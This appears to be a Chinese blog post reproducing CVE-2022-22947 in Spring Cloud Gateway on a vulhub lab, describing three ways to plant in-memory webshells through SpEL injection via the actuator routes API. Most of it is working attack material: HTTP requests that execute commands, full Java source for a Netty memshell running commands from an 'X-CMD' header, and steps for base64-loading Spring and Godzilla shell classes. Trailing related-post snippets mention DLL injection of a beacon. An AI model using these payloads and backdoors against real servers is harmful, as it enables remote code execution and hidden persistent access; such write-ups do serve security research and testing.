Spring Cloud gateway 三种方式注入内存马(详细过程)

原创 已于 2023-04-19 02:22:21 修改 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#spring boot #java #网络安全 #web安全

于 2023-04-19 02:20:47 首次发布
本文详述了在Spring Cloud Gateway中利用SPEL注入内存马的三种方法,包括c0ny1的Netty内存马、Spring内存马和哥斯拉马的实现过程。在复现过程中,作者强调了类路径的准确性、使用Java 1.8编译字节码以确保兼容性,并分享了相关资源链接。

申明

  免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

一:背景

     之前打攻防的时候,内网遇到了Spring Cloud gateway,照着网上的代码,一下午就是搞不定,当时由于时间紧,就放弃了(实际上是自己菜),现在闲下来, 用一下午时间把三种方式都复现成功了。这里记录下过程及坑点

二:过程

首先漏洞环境就是用的vulhub上面的 docker,连接在下面

https://vulhub.org/#/environments/spring/CVE-2022-22947/

docker启动后访问页面如下

 先来按照vulhub的payload 打一遍试试

首先注册一个路由,这个路由的值,用SpEL表达式执行代码

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.27.250.78:8080
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

 添加路由成功后,服务器返回201

 此时路由还未生效,我们需要刷新下路由

 刷新完路由,查看下路由列表,发现代码已经执行了

最后我们删除这条路由

 这样就算是完成了一次利用,每次执行命令都要注册路由,刷新路由,很是麻烦,下面根据网上的大佬们改造

1:首先当然是c0ny1的netty内存马

具体请看如下链接

Spring cloud gateway通过SPEL注入内存马 | 回忆飘如雪

我本地是起了一个springboot的maven项目好引入相关依赖,主要是下面这两个包

<parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.0</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>  

<dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-webflux</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework</groupId>
            <artifactId>spring-webflux</artifactId>
        </dependency>

然后我新建了一个包

com.example.demo.memshell

在这里把大佬的代码拷贝进来

public class NettyMemshell extends ChannelDuplexHandler implements ChannelPipelineConfigurer {
    public static String doInject(){
        String msg = "inject-start";
        try {
            Method getThreads = Thread.class.getDeclaredMethod("getThreads");
            getThreads.setAccessible(true);
            Object threads = getThreads.invoke(null);

            for (int i = 0; i < Array.getLength(threads); i++) {
                Object thread = Array.get(threads, i);
                if (thread != null && thread.getClass().getName().contains("NettyWebServer")) {
                    Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer");
                    _val$disposableServer.setAccessible(true);
                    Object val$disposableServer = _val$disposableServer.get(thread);
                    Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config");
                    _config.setAccessible(true);
                    Object config = _config.get(val$disposableServer);
                    Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit");
                    _doOnChannelInit.setAccessible(true);
                    _doOnChannelInit.set(config, new NettyMemshell());
                    msg = "inject-success";
                }
            }
        }catch (Exception e){
            msg = "inject-error";
        }
        return msg;
    }


    @Override
    // Step1. 作为一个ChannelPipelineConfigurer给pipline注册Handler
    public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) {
        ChannelPipeline pipeline=channel.pipeline();
        // 将内存马的handler添加到spring层handler的前面
        pipeline.addBefore("reactor.left.httpTrafficHandler", "memshell_handler", new NettyMemshell());
    }

    @Override
    // Step2. 作为Handler处理请求,在此实现内存马的功能逻辑
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
        if(msg instanceof HttpRequest){
            HttpRequest httpRequest = (HttpRequest)msg;
            try{
                if(httpRequest.headers().contains("X-CMD")){
                    String cmd = httpRequest.headers().get("X-CMD");
                    String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
                    //返回执行结果
                    send(ctx, execResult, HttpResponseStatus.OK);
                    return;
                }
            }catch (Exception e){
                e.printStackTrace();
            }
        }

        ctx.fireChannelRead(msg);
    }
    private void send(ChannelHandlerContext ctx, String context, HttpResponseStatus status) {
        FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context, CharsetUtil.UTF_8));
        response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8");
        ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE);
    }
}

具体原理,你们看大佬的分析就好,我什么都不懂!

然后编译下,生成class

我在我的springboot主程序里写了一段代码,把编译后的class字节码编码成base64的

  FileReader nettyMemShellfile = new FileReader("com/example/demo/memshell/NettyMemshell.class");
        String nettyBase64ByteCode= org.springframework.util.Base64Utils.encodeToString(nettyMemShellfile.readBytes());

   System.out.println("--------------");
        System.out.println("[*] NettyMemshell 注意此class路径为 【com.example.demo.memshell.NettyMemshell】 " + nettyBase64ByteCode);
        System.out.println("--------------");

 这样打印的时候就会显示出来

 然后就是按照上面的步骤开始注册路由

POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:8082
Connection: close
Content-Type: application/json
Content-Length: 8382

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.demo.memshell.NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vg....'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "https://wya.pl"
 
}

 刷新路由后,查看已经注册的,发现成功注册

 尝试下执行,成功了

 2:spring内存马

步骤跟上面一模一样,就是添加的时候要注意

,他是通过 这个bean获取的RequestMappingHandlerMapping

POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 172.27.250.78:8080
Connection: close
Content-Type: application/json
Content-Length: 5358


{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.demo.memshell.SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA......'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "https://wya.pl"
 
}

 3:哥斯拉马

参考这个大佬的代码

cve-2022-22947-godzilla-memshell/GMemShell.java at main · k4n5ha0/cve-2022-22947-godzilla-memshell · GitHub

同样的粘贴到我们的idea,生成字节码,打印base64

 添加路由

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.27.250.78:8080
Connection: close
Content-Type: application/json
Content-Length: 11109

{
"predicates":[{"name": "Path",
"args":{"_genkey_0":"/gmem/**"}
}
],
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.demo.memshell.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('base64的字节码'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}"
    }
  }],
  "uri": "http://test.com"
}

 刷新路由后,查看路由

 

 ok也成功了

 三:总结

1.提交请求包的时候一定要注意类路径要写正确,我有好几次不成功都是没写对

2.最好用java 1.8 编译字节码,兼容性比较好,不然会出现服务器版本和本地编译不一致的情况

参考资料:

CVE-2022-22947 注入哥斯拉内存马 – Whwlsfb's Tech Blog

Spring Cloud Gateway 注入哥斯拉内存马复现 - 国产大熊猫个人空间 - OSCHINA - 中文开源技术交流社区
Spring cloud gateway通过SPEL注入内存马 | 回忆飘如雪
 

滴水逆向三期 内存注入/无模块注入
四位的博客
01-05 3845
找文章看了一下, 讲的很好, 但是地址没了…尴尬, 03年的技术, 大致内容就是介绍了两种注入技术, 一个为常规的远程线程注入, 另一个就是内存注入. 只不过文章思路是只插入一段代码, 也就是编写shellcode. 而无模块注入则是将模块整体以内存写入的形式加载实现隐藏 . 杀软依然秒杀…但是我封装起来写后就检测不到, 特征码竟然消失了… 原理与问题 思路是将自己复制一份加载到目标进程中, 即注入进程和寄生程序是一个东西.不过想想也知道, 注入dll也是一个原理, 无非是拉伸之后再贴到目标进程, 最后依然
DLL加载器-远程线程注入(常规dll注入
bring_coco的博客
08-30 2315
注入思路 先获取到LoadLibrary的函数地址,之后使用CreateRemoteThread加载这段地址即可 简单例子: D:\VS项目\Dll3\x64\Debug\Dll3.dll kernel.dll加载的地址在所有进程都是一样的 https://zhuanlan.zhihu.com/p/599915628?utm_id=0 DLL进程注入 dll注入器 生成dll-2-1.exe 这里注入的exe是notepad++,找到其进程,注入的dll是我cs生成的beacon.dll 主要思路是:
CVE-2022-22947-Spring-Cloud-Gateway 内存POC
03-29
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 2.影响版本 3.1.0 3.0.0至3.0.6 Spring Cloud Gateway 其他已不再更新的版本
springboot gateway命令执行漏洞复现(CVE-2022-22947)内存
qq_61860998的博客
06-22 3441
springboot gateway命令执行+内存
论如何优雅的注入Java Agent内存
AS011x的博客
08-19 927
• 回顾• 优雅的构造JPLISAgent• Windows平台• Linux平台• 获取JVMTIEnv指针• 组装JPLISAgent• 动态修改类• Windows平台• Linux平台• 植入内存• 后记• 参考。
spring cloud gateway 例子
01-22
Spring Cloud Gateway 是一款基于 Spring Framework 5 和 Spring Boot 2 设计的云原生微服务网关,它旨在提供一种简单而有效的方式来对 API 进行路由,同时提供了过滤器功能,可以进行权限验证、限流、日志记录等...
SpringCloud Gateway跨域配置代码实例
08-25
在本文中,我们将详细介绍 SpringCloud Gateway 跨域配置代码实例。跨域配置是指在不同的源之间共享资源时,如何配置服务器以允许跨域请求。SpringCloud Gateway 提供了强大的跨域配置功能,通过配置可以实现跨域...
Spring Cloud Gateway
qq_41893505的博客
09-20 1194
多个 user-service 实例注册到 Nacos 中,服务名称相同(如 user-service),但每个实例的 IP 和端口不同。
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
CVE-2022-26134 Confluence 无文件落地的内存注入姿势
qq_40466372的博客
07-06 6076
CVE-2022-26134 Confluence 无文件落地的内存注入
spring打入filter内存+冰蝎成功
bring_coco的博客
08-29 2378
注意springboot版本过高注入失败,会报错。springboot版本2.4.5。可以看的spring内存注入成功。fastjson版本1.2.24。我们版本不变,换个内存再打一遍。Test.java内存)可以看到报错了,报错为。
Spring Cloud Gateway Actuator API SpEL代码注入
小白的博客
04-18 2573
CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL代码注入 影响版本 Spring Cloud GateWay 3.0.0以下,3.1.0,3.0.0~3.0.6 漏洞描述 ​ Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由, 以及提供一些强大的过滤器功能, 例如: 熔断、限流、
【189期】利用 Fastjson 注入 Spring MVC 内存,太秀了~!
Java精选
12-04 597
点击上方“Java精选”,选择“设为星标”别问别人为什么,多问自己凭什么!下方有惊喜,留言必回,有问必答!每天08:35更新文章,每天进步一点点...1、基础实际上java内存注入...
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存
bring_coco的博客
06-26 1957
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存写了进去。接下来执行内存,可以直接访问接口并输入命令,如下。
Spring Cloud Gateway代码执行漏洞
qq_45455136的博客
03-13 4654
CVE-2022-22947基本介绍基本介绍Spring Cloud Gateway
内存实战(持续更新中)
qq_44657899的博客
05-16 6202
计划 复现以下框架的内存注入: shiro(aes base64 加密) 普通内存 冰蝎 WebSocket xxl-job filter 冰蝎 netty内存 agent内存 JNDI(字节码里执行) SpringBoot spel表达式注入spring cloud gateway) Struts2的ognl表达式注入 Tomcat的EL表达式注入 参考:https://gv7.me/articles/2022/the-spring-cloud-gatewa
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_63299551的博客
06-24 1333
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现。
Spring Cloud Gateway 远程代码执行(CVE-2022-22947)
最新发布
m0_62484818的博客
10-09 922
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的 API路由管理方式Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
win10 x64实现内存注入DLL
weixin_41725706的博客
11-29 2941
win10 x64内存注入DLL,可以躲避相关api检测模块
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值